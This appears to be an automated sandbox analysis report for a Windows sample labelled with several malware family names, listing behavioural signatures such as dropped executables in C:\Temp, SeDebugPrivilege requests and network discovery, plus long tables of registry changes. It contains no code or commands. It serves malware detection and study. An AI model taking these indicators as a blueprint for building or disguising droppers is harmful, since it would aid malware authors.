Analysis Overview
SHA256
3d50860483f03ced72f9166831c5f4326aae3acfdd0cc1d278b4e6b3211e9f7e
Threat Level: Shows suspicious behavior
The file 2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious behavior: LoadsDriver
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Gathers network information
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-03 05:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-03 05:54
Reported
2025-07-03 05:57
Platform
win10v2004-20250619-en
Max time kernel
149s
Max time network
140s
Command Line
Signatures
Executes dropped EXE
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_eywqoigbyt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qkicavsnlf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qkicavsnlf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kfdxvpnifa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_causmkecxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\fzxrpkhczu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_wrpjhbzurm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_rmjecwuomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\qljdbvtnlg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\igbytrljdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\oigaytqljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_oigaytqljd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_causmkfcxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_ecwupmhfzx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_bztrljebwu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_igbytrljdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_igaysqlida.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ywqojgbztr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\eywqoigbyt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\sqlidavtnl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_fzxrpkhczu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\wrpjhbzurm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\faysqkicav.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_faysqkicav.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kfcxupnhfz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\yvqoigaytq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\temp\CreateProcess.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\causmkecxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\rmjecwuomg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\causmkfcxu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\kfcxupnhfz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\ecwupmhfzx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_ywqojgbztr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\gaysqlidbvtnlfdy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\pnhfaxsqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_pnhfaxsqki.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_qljdbvtnlg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_kfdxvpnifa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\igaysqlida.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_yvqoigaytq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\i_sqlidavtnl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Temp\bztrljebwu.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\windows\system32\ipconfig.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000001ae698d4dc529193fb739ab8579f60fa89deabab4fad6ddd6edeb4f45ce795ed000000000e80000000020000200000002e8ee7a93441166102f27d01a6a7837e7d1296bad16575d9d6b71516b2879f742000000007cbd71f6faab943dd1d2e622521a82759c6c966dd6a94ab8f8addb25db88ef4400000009cd7db07d183aa9b3e4cac3103d21df5e463a728d2abc94814c237dfa751475dea760d43639dc9512a7add064e275d65ad713e3280b7ff7d9640c472c3790186 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\User Preferences | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 04e1a46c61e1db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 04e1a46c61e1db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000002d5f9b32d7ad8579c51ae169a6dc60375a45fb02a867a31606039991b5194a8c000000000e8000000002000020000000cff5908bbb0d5d263fc143d5b81d3f9a3b750b03998948d7dc792cda422e49da100000004f5ed7be25e1a14a723f1fad7efabc3940000000baf41d9eaf9f33413272e4fcfb3ebc202320698ee560753097956d0e9b26d7196de8df76a2a8aa955ce3c4b28ced1df536edb7a80d45743992f5d9bd64779360 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30aa6f17dfebdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4240665B-57D2-11F0-9B6E-C2DCADC1FE9C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "381482518" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 301b7217dfebdb01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458287076" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000982d4e763a2bc45f97f3ff8192843bb23c58052dfa046135ca5da319caac0cf6000000000e80000000020000200000008c2d350cd3a022671bc1ce2df317819bae5c8ed478b63743175ae4ba10ff50bf10000000201e76672764b644cd70862453ddcd994000000062a78e5998df3a809e6938956f968b19edb66b27b0a370108d5f45ed0a969ebc128049774748dff5b54055bd7e183618b44c8cbd4a0317cde9ab6f42b0ddd44e | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000007c1347e0c0c896f52b4de36f1193825bc56f040fb55b3213222cadaafd52aac9000000000e8000000002000020000000c8623b68226d9233f7e8207f8c5f580880b08140ddad5c75bf2b165ef73c0cf6200000005bb4925abccb4b758a12d434b5d0e0f6ed363482f1ac340c8e599e21c3611b0040000000e3c6c29f2d77c0a6cac0cc8e04326734e2308c8ab897945a7115fa00dedb1efca733dc353012f7858a69fcc91d03b36b0e7dca0d3e89e20880aaf50d0192657f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = (binary value not captured) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = (binary value not captured) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "385700650" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qljdbvtnlg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qkicavsnlf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_kfdxvpnifa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_causmkecxu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_fzxrpkhczu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wrpjhbzurm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_rmjecwuomg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_igbytrljdb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_oigaytqljd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_igaysqlida.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_faysqkicav.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_causmkfcxu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_kfcxupnhfz.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ecwupmhfzx.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_bztrljebwu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ywqojgbztr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_eywqoigbyt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_yvqoigaytq.exe | N/A |
